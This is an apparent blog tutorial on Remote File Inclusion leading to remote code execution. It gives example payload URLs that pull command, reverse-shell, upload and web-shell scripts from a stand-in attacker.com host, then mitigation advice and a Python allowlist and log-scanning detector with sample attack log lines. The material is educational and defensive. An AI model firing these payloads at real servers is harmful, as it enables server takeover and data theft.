Remote File Inclusion (RFI) to RCE

Aditya Chauhan
Feb 15, 2023

Remote File Inclusion (RFI) is a type of web application vulnerability that allows attackers to remotely execute code on a vulnerable web server. In an RFI attack, an attacker is able to manipulate a web application to include a file from a remote server, which can contain malicious code that is executed on the web server. This can lead to remote code execution (RCE), which is a serious security issue that can allow an attacker to take complete control of the web server.

The basic principle of an RFI attack is to trick a web application into loading a file from a remote server. Typically, this involves manipulating the web application's input parameters to include a URL that points to a malicious file hosted on a remote server. When the application processes this input, it fetches the contents of the remote file and includes it in the application's output. This can lead to the execution of malicious code, including RCE payloads that give the attacker complete control over the server.

There are several ways to exploit an RFI vulnerability to achieve RCE. Some of the most common payloads used in RFI attacks include:

  1. Command Injection payloads: These payloads involve including a command that is executed on the web server. For example, an attacker could include a command to create a new user account on the server, which would give the attacker administrative access.
  2. Reverse Shell payloads: These payloads involve including a reverse shell script that connects back to the attacker's system. Once the shell is established, the attacker can execute commands on the server and take control of the system.
  3. File Upload payloads: These payloads involve including a file upload script that allows the attacker to upload and execute a malicious file on the server.
  4. Web Shell payloads: These payloads involve including a web shell script that provides the attacker with a web-based interface for executing commands on the server.

Here are some specific examples of RFI payloads that can be used to achieve RCE:

  1. Command Injection payload:

http://example.com/index.php?page=http://attacker.com/cmd.php?cmd=id

This payload will execute the 'id' command on the server, which will return the current user ID and group ID.

  2. Reverse Shell payload:

http://example.com/index.php?page=http://attacker.com/shell.php

This payload will establish a reverse shell connection to the attacker's system. The attacker can then use the shell to execute commands on the server.

  3. File Upload payload:

http://example.com/index.php?page=http://attacker.com/upload.php

This payload will allow the attacker to upload a malicious file to the server, which can then be executed to achieve RCE.

  4. Web Shell payload:

http://example.com/index.php?page=http://attacker.com/webshell.php

This payload will provide the attacker with a web-based interface for executing commands on the server.

In order to prevent RFI attacks that can lead to RCE, web application developers must validate and sanitize the input that selects which file is included, so that a parameter like `page` can never resolve to an attacker-supplied URL. They should also use security frameworks and libraries that help detect and prevent RFI attacks. Additionally, server administrators should limit the web server's access to the file system and use firewalls to block outbound connections from the web server to remote hosts.
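The two defensive measures above, as an added example in Python that is not code from the post: an allowlist that replaces building an include path from the raw `page` parameter, and a detector that flags remote-URL values in access logs. The `ALLOWED_PAGES` map and the log lines are constructed for illustration; the log format is the common Apache/nginx combined style.

```python
"""Allowlist-based include resolution and access-log detection for RFI
attempts against a ``?page=`` parameter. Added example, not code from the
post; the allowlist entries and log lines are constructed."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Hypothetical allowlist: the only values ?page= may ever resolve to.
ALLOWED_PAGES = {"home": "pages/home.php", "about": "pages/about.php"}

# Anything carrying a URL scheme (http://, https://, ftp://, ...) is a remote
# include attempt; decode first so %3A%2F%2F does not slip past the check.
_SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*:", re.IGNORECASE)

def is_rfi_attempt(value: str) -> bool:
    """True when a page parameter value points at a remote resource."""
    decoded = unquote(unquote(value)).strip()   # also handles double encoding
    return bool(_SCHEME.match(decoded))

def resolve_page(value: str):
    """Mitigation: never build an include path from raw input. Return the
    allowlisted file for ``value`` or None (the caller serves a 404)."""
    return ALLOWED_PAGES.get(value)

# Combined log format: ip ident user [time] "METHOD path HTTP/x" status bytes
_LOG = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def scan_access_log(lines):
    """Detection: return (client_ip, page_value, status) for every request
    whose ?page= value looks like a remote include."""
    hits = []
    for line in lines:
        m = _LOG.match(line)
        if not m:
            continue
        ip, path, status = m.groups()
        for value in parse_qs(urlsplit(path).query).get("page", []):
            if is_rfi_attempt(value):
                hits.append((ip, unquote(value), int(status)))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Feb/2023:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '198.51.100.9 - - [15/Feb/2023:10:00:02 +0000] "GET /index.php?page=http://attacker.example/cmd.php HTTP/1.1" 200 88',
    '198.51.100.9 - - [15/Feb/2023:10:00:03 +0000] "GET /index.php?page=https%3A%2F%2Fattacker.example%2Fshell.php HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("RFI attempt from %s: page=%s (HTTP %d)" % hit)
```

A hit with a 200 status deserves a closer look, since it means the application returned normally rather than rejecting the value. On PHP deployments the allowlist should be backed by `allow_url_include = Off` in php.ini, so that `include` refuses remote URLs even if a validation bug slips through.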

In conclusion, RFI to RCE attacks are a serious security issue that can allow attackers to take complete control of a web server. Web application developers and server administrators should take steps to prevent these types of attacks by implementing proper security measures and best practices.
